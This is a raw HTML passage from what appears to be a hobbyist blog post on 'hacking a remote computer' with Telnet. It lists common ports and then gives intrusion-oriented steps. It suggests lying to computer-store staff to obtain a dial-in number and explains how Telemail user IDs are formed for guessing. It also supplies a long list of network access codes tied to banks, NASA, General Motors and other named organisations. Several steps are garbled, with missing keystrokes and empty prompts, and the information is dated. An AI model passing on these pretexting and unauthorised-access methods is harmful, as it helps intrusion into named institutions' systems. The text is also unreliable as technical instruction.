&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;SSH : 22&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Telnet : 23&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;SMTP : 25&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Whois : 43&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Finger : 79&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;HTTP : 80&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;POP : 110&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Method 2&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;You can connect to a remote computer at a particular port. When you are &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;connected&lt;/span&gt; to that port then you can interchange information related to that particular port only. Ports can be open or closed. If a particular port of a computer is closed then you can not connect to that computer&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;on that port. Generally most of the computers have atleast 5 or 6 ports open&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;First goto run and type &lt;b&gt;telnet:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;b&gt;&lt;b&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin: 0px; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin: 0px; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVGEKgXsrSkDuWsYGkbPX68oDi2cQGOR52O_6vmyd2AidGbSy5FpazIiRG4niHjdsC_MGxNWGsoccnYzA-Cz0hO_NX-4rKEPnGrO7mVBpMGFyLFW6I-isd8XDgrKm9pC2a9S-cyXojRZE/s1600-h/startrun.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;hack a remote computer&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVGEKgXsrSkDuWsYGkbPX68oDi2cQGOR52O_6vmyd2AidGbSy5FpazIiRG4niHjdsC_MGxNWGsoccnYzA-Cz0hO_NX-4rKEPnGrO7mVBpMGFyLFW6I-isd8XDgrKm9pC2a9S-cyXojRZE/s320/startrun.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;b&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin: 0px; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzHVRGKz6uBuxWXv8NRiltuKGFFpQwf1ETs1Co7OnkKSeIMAqMyB0sv4kEpZQef1XXHG9J0ptaLJLed9Vn3Vvu_jVQ58gI6XtRSIUJ3F5f5Y10KYW_d5I2isALoCWeEFR5m3Cxm6TR5MU/s1600-h/runtelnet.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;Hack a computer&quot; border=&quot;0&quot; height=&quot;187&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzHVRGKz6uBuxWXv8NRiltuKGFFpQwf1ETs1Co7OnkKSeIMAqMyB0sv4kEpZQef1XXHG9J0ptaLJLed9Vn3Vvu_jVQ58gI6XtRSIUJ3F5f5Y10KYW_d5I2isALoCWeEFR5m3Cxm6TR5MU/s320/runtelnet.jpg&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin: 0px; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Once the Telnet windows pops up click on &lt;b&gt;Connect-&amp;gt;RemoteSystem&lt;/b&gt; then in the host name type the host i.e. the IP address of the remote computer or the website you want to connect to . Then in the Port select the port you want to connect to . You can only connect to ports which are open on the host computer.Almost always leave the TermType to vt100.We use vt100 as it is compatible with most monitors .&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Then click connect and you will be connected to the remote machine in some time. The syntax of the telnet command from DOS prompt is C:\&amp;gt;telnet.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;By default port is taken as 23. Scroll down and read more about ports&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;The first thing you have to do if you want to hack with Telnet, is find your local Telnet phone number.This can be done many ways. One way that always works, is to call up your local computer store, tel them that you recently purchased The Source or something like that, but that you lost the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD12&quot;&gt;sheet&lt;/span&gt; that has the phone no. written on it.They&#39;ll tell it to you. (People who work in computer stores usualy aren&#39;t very smart&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;about that sort of thing.)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Call the number with your computer. Once the connection is established,&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;press twice. the computer will display &quot;&lt;b&gt;TERMINAL=&lt;/b&gt;&quot; Type again. The computer will then display an at sign: &quot;&quot; Type in the access code here.:below are some access codes listed&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;(But please don&#39;t misuse it)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;------------------------------------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Telemail&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;--------&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;To use the Telemail feature of Telenet, type mail at the &quot;&quot; prompt.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;User id&#39;s are usually the first initial of the user&#39;s first name, plus&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;the last name.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;eg- William gates= Wgates&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;-------------------------------------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20120 - VM 370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20124N- NEW YORK TIME INFORMATION SERVICE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20125 - NJIT ELECTRONIC INFORMATION&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20130&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20133&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20138&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20148&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20154&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20165&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20166&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20167 - WARNER COMPUTER &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot;&gt;SYSTEMS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20168 - WARNER COMPUTER SYSTEMS&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20171&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20182 - BANKERS TRUST &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;CUSTOMER SERVICE&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20184&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20222&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20225 - COMSHARE &quot;COMMANDER II&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20246&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20247 - GSD TIMESHARING&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20270 - GSD TIMESHARING&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202124- GENERAL MOTORS WARREN&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202133&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202138- (TYPE .HELP *)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202139- (TYPE .HELP *)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202140- (TYPE .HELP *)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202143&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202144- (TYPE .HELP *)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202148&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202149&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202175 - &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;HONEYWELL&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202222 - &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;GM PARTS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 202229 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 20321 - WYLBUR&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21221 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21224 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21225 - INTERACTIVE MARKET SYSTEMS&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21226 - INTERACTIVE MARKET SYSTEMS&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21228 - BURROUGHS NYC DATA CENTER&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21229 - LANDART SYSTEMS&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21231 - E.F.HUTTON&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21233 - UNIVAC 1100&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21247&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21248&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21252&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21253 - VM/370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21256 - CITIBANK &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;CASH MANAGER&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21264 - CITICASH MANAGER INTERNATIONAL&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21265 - CITICASH MANAGER INTERNATIONAL&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21269&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21281 - BANKERS TRUST CUSTOMER SERVICE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21284 - DATAMOR TIME SHARING&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21288 - S-K WDC &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD11&quot;&gt;SYSTEM&lt;/span&gt; 1/ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212136 - (TYPE NEW/TSC)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212141&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212142&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212151 - CITICASH MANAGER INTERNATIONAL&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212152&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21255 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21256 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212160 - TELSTAT SIGMA 6&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212167 - RSTS V.7.0-07&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212168 - RSTS V.7.0-07&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212171&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 212172&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21284 - DATAMOR TIME SHARING&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21325 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21335 - MARKETRON RESEARCH AND SALES&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21336 - MARKETRON RESEARCH AND SALES&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21341&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21360&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21365&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21366&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 213170 - DIALOG&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21370 - XCC-WEST SYSTEM X2&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21371 - XCC-WEST SYSTEM X3&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21372 - XCC-WEST SYSTEM X3&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21373 - XCC-WEST SYSTEM X1&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21375 - XCC-WEST SYSTEM X2&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21379 - INTERACTIVE SYSTEM/ONE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21384&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21385&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21386 - IAS PROGRAM DEVELOPMENT SYSTEM&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21388&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 213105&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21520 - TPF&amp;amp;C ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21534 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21538&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21722&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21725&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 21726 - U OF I COMPUTING SERVICES&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30121 - NASA RECON&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30124 - SOURCE SYSTEM 10&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30126 - DISTRIBUTIVE NETWORK&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30128 - SOURCE SYSTEM 13&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30134 - INTERACTIVE(GAITHERSBURG)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30135&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30136&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30138 - SOURCE SYSTEM 11&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30147 - SOURCE SYSTEM 12&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30148 - SOURCE SYSTEM 15&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30149 - SOURCE SYSTEM 14&lt;/span&gt;&lt;br /&gt;
